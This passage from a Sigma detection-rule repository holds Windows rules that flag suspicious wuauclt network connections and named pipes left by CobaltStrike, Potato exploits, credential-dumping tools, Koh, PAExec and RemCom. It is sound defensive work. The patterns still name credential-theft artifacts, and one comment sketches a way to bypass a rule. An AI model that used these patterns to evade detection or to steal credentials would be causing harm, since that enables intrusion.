    "content": "title: Potentially Suspicious Wuauclt Network Connection\nid: c649a6c7-cd8c-4a78-9c04-000fc76df954\nstatus: test\ndescription: |\n    Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections.\n    One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\nreferences:\n    - https://dtm.uk/wuauclt/\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2024-03-12\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: network_connection\n    product: windows\n    definition: 'Requirements: The CommandLine field enrichment is required in order for this rule to be used.'\ndetection:\n    selection:\n        Image|contains: 'wuauclt'\n        CommandLine|contains: ' /RunHandlerComServer'\n    # \"C:\\WINDOWS\\uus\\AMD64\\wuauclt.exe\" /DeploymentHandlerFullPath \\\\?\\C:\\Windows\\UUS\\AMD64\\UpdateDeploy.dll /ClassId aaa256e1-5b21-4993-9188-18f07ccb3b98 /RunHandlerComServer\n    filter_main_ip:\n        DestinationIp|cidr: # Ranges excluded based on https://github.com/SigmaHQ/sigma/blob/0f176092326ab9d1e19384d30224e5f29f760d82/rules/windows/network_connection/net_connection_win_dllhost_net_connections.yml\n            - '127.0.0.0/8'\n            - '10.0.0.0/8'\n            - '169.254.0.0/16'  # link-local address\n            - '172.16.0.0/12'\n            - '192.168.0.0/16'\n            - '::1/128'  # IPv6 loopback\n            - 'fe80::/10'  # IPv6 link-local addresses\n            - 'fc00::/7'  # IPv6 private addresses\n    filter_main_msrange:  # Sysmon\n        DestinationIp|cidr:\n            - '20.184.0.0/13' # Microsoft Corporation\n            - '20.192.0.0/10' # Microsoft Corporation\n            - '23.79.0.0/16' # Microsoft Corporation\n            - '51.10.0.0/15'\n            - '51.103.0.0/16' # Microsoft Corporation\n            - '51.104.0.0/15' # Microsoft Corporation\n            - '52.224.0.0/11' # Microsoft Corporation\n    filter_main_uus:\n        CommandLine|contains:\n            - ':\\Windows\\UUS\\Packages\\Preview\\amd64\\updatedeploy.dll /ClassId'\n            - ':\\Windows\\UUS\\amd64\\UpdateDeploy.dll /ClassId'\n    filter_main_winsxs:\n        CommandLine|contains|all:\n            - ':\\Windows\\WinSxS\\'\n            - '\\UpdateDeploy.dll /ClassId '\n    filter_main_cli_null:\n        CommandLine: null\n    filter_main_cli_empty:\n        CommandLine: ''\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_adfs_namedpipe_connection_uncommon_tool.yml",
    "content": "title: ADFS Database Named Pipe Connection By Uncommon Tool\nid: 1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3\nstatus: test\ndescription: |\n    Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\n    Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\nreferences:\n    - https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml\n    - https://o365blog.com/post/adfs/\n    - https://github.com/Azure/SimuLand\nauthor: Roberto Rodriguez @Cyb3rWard0g\ndate: 2021-10-08\nmodified: 2023-11-30\ntags:\n    - attack.collection\n    - attack.t1005\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName: '\\MICROSOFT##WID\\tsql\\query'\n    filter_main_generic:\n        Image|endswith:\n            - ':\\Windows\\System32\\mmc.exe'\n            - ':\\Windows\\system32\\svchost.exe'\n            - ':\\Windows\\System32\\wsmprovhost.exe'\n            - ':\\Windows\\SysWOW64\\mmc.exe'\n            - ':\\Windows\\SysWOW64\\wsmprovhost.exe'\n            - ':\\Windows\\WID\\Binn\\sqlwriter.exe'\n            - '\\AzureADConnect.exe'\n            - '\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe'\n            - '\\Microsoft.IdentityServer.ServiceHost.exe'\n            - '\\Microsoft.Tri.Sensor.exe'\n            - '\\sqlservr.exe'\n            - '\\tssdis.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike.yml",
    "content": "title: CobaltStrike Named Pipe\nid: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2\nrelated:\n    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns\n      type: similar\n    - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe as used by CobaltStrike\nreferences:\n    - https://twitter.com/d4rksystem/status/1357010969264873472\n    - https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/\n    - https://github.com/SigmaHQ/sigma/issues/253\n    - https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/\n    - https://redcanary.com/threat-detection-report/threats/cobalt-strike/\nauthor: Florian Roth (Nextron Systems), Wojciech Lesicki\ndate: 2021-05-25\nmodified: 2022-10-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection_MSSE:\n        PipeName|contains|all:\n            - '\\MSSE-'\n            - '-server'\n    selection_postex:\n        PipeName|startswith: '\\postex_' # Also include the pipe \"\\postex_ssh_\"\n    selection_status:\n        PipeName|startswith: '\\status_'\n    selection_msagent:\n        PipeName|startswith: '\\msagent_'\n    selection_mojo:\n        PipeName|startswith: '\\mojo_'\n    selection_interprocess:\n        PipeName|startswith: '\\interprocess_'\n    selection_samr:\n        PipeName|startswith: '\\samr_'\n    selection_netlogon:\n        PipeName|startswith: '\\netlogon_'\n    selection_srvsvc:\n        PipeName|startswith: '\\srvsvc_'\n    selection_lsarpc:\n        PipeName|startswith: '\\lsarpc_'\n    selection_wkssvc:\n        PipeName|startswith: '\\wkssvc_'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml",
    "content": "title: CobaltStrike Named Pipe Pattern Regex\nid: 0e7163d4-9e19-4fa7-9be6-000c61aad77a\nrelated:\n    - id: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7 # Patterns\n      type: similar\n    - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles\nreferences:\n    - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n    - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-07-30\nmodified: 2022-12-31\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        - PipeName|re: '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}'\n        - PipeName|re: '\\\\wkssvc_?[0-9a-f]{2}'\n        - PipeName|re: '\\\\ntsvcs[0-9a-f]{2}'\n        - PipeName|re: '\\\\DserNamePipe[0-9a-f]{2}'\n        - PipeName|re: '\\\\SearchTextHarvester[0-9a-f]{2}'\n        - PipeName|re: '\\\\mypipe-(?:f|h)[0-9a-f]{2}'\n        - PipeName|re: '\\\\windows\\.update\\.manager[0-9a-f]{2,3}'\n        - PipeName|re: '\\\\ntsvcs_[0-9a-f]{2}'\n        - PipeName|re: '\\\\scerpc_?[0-9a-f]{2}'\n        - PipeName|re: '\\\\PGMessagePipe[0-9a-f]{2}'\n        - PipeName|re: '\\\\MsFteWds[0-9a-f]{2}'\n        - PipeName|re: '\\\\f4c3[0-9a-f]{2}'\n        - PipeName|re: '\\\\fullduplex_[0-9a-f]{2}'\n        - PipeName|re: '\\\\msrpc_[0-9a-f]{4}'\n        - PipeName|re: '\\\\win\\\\msrpc_[0-9a-f]{2}'\n        - PipeName|re: '\\\\f53f[0-9a-f]{2}'\n        - PipeName|re: '\\\\rpc_[0-9a-f]{2}'\n        - PipeName|re: '\\\\spoolss_[0-9a-f]{2}'\n        - PipeName|re: '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_susp_pipe_patterns.yml",
    "content": "title: CobaltStrike Named Pipe Patterns\nid: 85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7\nrelated:\n    - id: 0e7163d4-9e19-4fa7-9be6-000c61aad77a # Regex\n      type: similar\n    - id: d5601f8c-b26f-4ab0-9035-69e11a8d4ad2 # Generic\n      type: similar\nstatus: test\ndescription: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles\nreferences:\n    - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\n    - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752\nauthor: Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)\ndate: 2021-07-30\nmodified: 2024-01-26\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - stp.1k\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can always use Cobalt Strike, but also you can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection_malleable_profile_generic:\n        - PipeName|startswith:\n              - '\\DserNamePipe'\n              - '\\f4c3'\n              - '\\f53f'\n              - '\\fullduplex_'\n              - '\\mojo.5688.8052.183894939787088877'\n              - '\\mojo.5688.8052.35780273329370473'\n              - '\\MsFteWds'\n              - '\\msrpc_'\n              - '\\mypipe-f'\n              - '\\mypipe-h'\n              - '\\ntsvcs'\n              - '\\PGMessagePipe'\n              - '\\rpc_'\n              - '\\scerpc'\n              - '\\SearchTextHarvester'\n              - '\\spoolss'\n              - '\\win_svc'\n              - '\\win\\msrpc_'\n              - '\\windows.update.manager'\n              - '\\wkssvc'\n        - PipeName:\n              - '\\demoagent_11'\n              - '\\demoagent_22'\n    selection_malleable_profile_catalog_change_listener:\n        PipeName|startswith: '\\Winsock2\\CatalogChangeListener-'\n        PipeName|endswith: '-0,'\n    filter_main_generic:\n        PipeName:\n            - '\\wkssvc'\n            - '\\spoolss'\n            - '\\scerpc'\n            - '\\ntsvcs'\n            - '\\SearchTextHarvester'\n            - '\\PGMessagePipe'\n            - '\\MsFteWds'\n    filter_optional_websense:\n        Image|contains:\n            - ':\\Program Files\\Websense\\'\n            - ':\\Program Files (x86)\\Websense\\'\n        PipeName|startswith:\n            - '\\DserNamePipeR'\n            - '\\DserNamePipeW'\n    condition: 1 of selection_malleable_profile_* and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Chrome instances using the exact same pipe name \"mojo.xxx\"\n    - Websense Endpoint using the pipe name \"DserNamePipe(R|W)\\d{1,5}\"\nlevel: high\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_coercedpotato.yml",
    "content": "title: HackTool - CoercedPotato Named Pipe Creation\nid: 4d0083b3-580b-40da-9bba-626c19fe4033\nstatus: test\ndescription: Detects the pattern of a pipe name as used by the hack tool CoercedPotato\nreferences:\n    - https://blog.hackvens.fr/articles/CoercedPotato.html\n    - https://github.com/hackvens/CoercedPotato\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-10-11\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\coerced\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_diagtrack_eop.yml",
    "content": "title: HackTool - DiagTrackEoP Default Named Pipe\nid: 1f7025a6-e747-4130-aac4-961eb47015f1\nstatus: test\ndescription: Detects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses \"SeImpersonate\" privilege.\nreferences:\n    - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-03\nmodified: 2023-08-07\ntags:\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: 'thisispipe' # Based on source code\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_efspotato.yml",
    "content": "title: HackTool - EfsPotato Named Pipe Creation\nid: 637f689e-b4a5-4a86-be0e-0100a0a33ba2\nstatus: test\ndescription: Detects the pattern of a pipe name as used by the hack tool EfsPotato\nreferences:\n    - https://twitter.com/SBousseaden/status/1429530155291193354?s=20\n    - https://github.com/zcgonvh/EfsPotato\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-23\nmodified: 2023-12-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\pipe\\'\n            - '\\pipe\\srvsvc'  # more specific version (use only this one if the other causes too many false positives)\n    filter_optional_ctx:\n        PipeName|contains: '\\CtxShare'\n    filter_optional_default:\n        PipeName|startswith: '\\pipe\\' # excludes pipes that start with \\pipe\\*\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - \\pipe\\LOCAL\\Monitorian # https://github.com/emoacht/Monitorian\nlevel: high\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_generic_cred_dump_tools_pipes.yml",
    "content": "title: HackTool - Credential Dumping Tools Named Pipe Created\nid: 961d0ba2-3eea-4303-a930-2cf78bbfcc5e\nstatus: test\ndescription: Detects well-known credential dumping tools execution via specific named pipe creation\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\n    - https://image.slidesharecdn.com/zeronights2017kheirkhabarov-171118103000/75/hunting-for-credentials-dumping-in-windows-environment-57-2048.jpg?cb=1666035799\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-11-01\nmodified: 2023-08-07\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\cachedump'\n            - '\\lsadump'\n            - '\\wceservicepipe'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using tool for password recovery\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_hktl_koh_default_pipe.yml",
    "content": "title: HackTool - Koh Default Named Pipe\nid: 0adc67e0-a68f-4ffd-9c43-28905aad5d6a\nstatus: test\ndescription: Detects creation of default named pipes used by the Koh tool\nreferences:\n    - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-08\nmodified: 2023-08-07\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.t1528\n    - attack.t1134.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains:\n            - '\\imposecost'\n            - '\\imposingcost'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_powershell_alternate_host_pipe.yml",
    "content": "title: Alternate PowerShell Hosts Pipe\nid: 58cb02d5-78ce-4692-b3e1-dce850aae41a\nrelated:\n    - id: ac7102b4-9e1e-4802-9b4f-17c5524c015c\n      type: derived\nstatus: test\ndescription: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\n    - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton\ndate: 2019-09-12\nmodified: 2025-10-07\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PSHost'\n    filter_main_generic:\n        - Image|contains:\n              - ':\\Program Files\\PowerShell\\7-preview\\pwsh.exe' # Powershell 7\n              - ':\\Program Files\\PowerShell\\7\\pwsh.exe' # Powershell 7\n              - ':\\Windows\\system32\\dsac.exe'\n              - ':\\Windows\\system32\\inetsrv\\w3wp.exe'   # this is sad :,( but it triggers FPs on Exchange servers\n              - ':\\Windows\\System32\\sdiagnhost.exe'\n              - ':\\Windows\\system32\\ServerManager.exe'\n              - ':\\Windows\\system32\\wbem\\wmiprvse.exe'\n              - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n              - ':\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n              - ':\\Windows\\System32\\wsmprovhost.exe'\n              - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n              - ':\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe'\n        - Image|contains|all:\n              - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview'\n              - '\\pwsh.exe'\n        - Image|contains|all:\n              - '\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview'\n              - '\\pwsh.exe'\n    filter_optional_sqlserver: # Microsoft SQL Server\\130\\Tools\\\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\'\n            - 'C:\\Program Files\\'\n        Image|contains: '\\Microsoft SQL Server\\'\n        Image|endswith: '\\Tools\\Binn\\SQLPS.exe'\n    filter_optional_azure_connected_machine_agent:\n        # Azure Connected Machine Agent (https://devblogs.microsoft.com/powershell/azure-policy-guest-configuration-client/)\n        Image|startswith: 'C:\\Program Files\\AzureConnectedMachineAgent\\GCArcService'\n        Image|endswith: '\\GC\\gc_worker.exe'\n    filter_optional_citrix:\n        Image|startswith: 'C:\\Program Files\\Citrix\\'\n    filter_optional_exchange:\n        Image|startswith: 'C:\\Program Files\\Microsoft\\Exchange Server\\'\n    filter_main_null:\n        Image: null\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Programs using PowerShell directly without invocation of a dedicated interpreter.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml",
    "content": "title: New PowerShell Instance Created\nid: ac7102b4-9e1e-4802-9b4f-17c5524c015c\nrelated:\n    - id: 58cb02d5-78ce-4692-b3e1-dce850aae41a\n      type: derived\nstatus: test\ndescription: Detects the execution of PowerShell via the creation of a named pipe starting with PSHost\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\n    - https://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2019-09-12\nmodified: 2023-11-30\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PSHost'\n    condition: selection\nfalsepositives:\n    - Likely\nlevel: informational\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_csexec_default_pipe.yml",
    "content": "title: PUA - CSExec Default Named Pipe\nid: f318b911-ea88-43f4-9281-0de23ede628e\nrelated:\n    - id: 9e77ed63-2ecf-4c7b-b09d-640834882028\n      type: obsolete\nstatus: test\ndescription: Detects default CSExec pipe creation\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://github.com/malcomvetter/CSExec\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\nmodified: 2023-11-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\csexecsvc'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_paexec_default_pipe.yml",
    "content": "title: PUA - PAExec Default Named Pipe\nid: f6451de4-df0a-41fa-8d72-b39f54a08db5\nstatus: test\ndescription: Detects PAExec default named pipe\nreferences:\n    - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md\n    - https://github.com/poweradminllc/PAExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    category: pipe_created\n    product: windows\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|startswith: '\\PAExec'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml",
    "content": "title: PUA - RemCom Default Named Pipe\nid: d36f87ea-c403-44d2-aa79-1a0ac7c24456\nrelated:\n    - id: 9e77ed63-2ecf-4c7b-b09d-640834882028\n      type: obsolete\nstatus: test\ndescription: Detects default RemCom pipe creation\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\n    - https://github.com/kavika13/RemCom\nauthor: Nikita Nazarov, oscd.community, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\nmodified: 2023-11-30\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        PipeName|contains: '\\RemCom'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml",
    "content": "title: WMI Event Consumer Created Named Pipe\nid: 493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb\nstatus: test\ndescription: Detects the WMI Event Consumer service scrcons.exe creating a named pipe\nreferences:\n    - https://github.com/RiccardoAncarani/LiquidSnake\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-09-01\nmodified: 2023-11-30\ntags:\n    - attack.t1047\n    - attack.execution\nlogsource:\n    product: windows\n    category: pipe_created\n    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'\ndetection:\n    selection:\n        Image|endswith: '\\scrcons.exe'\n    condition: 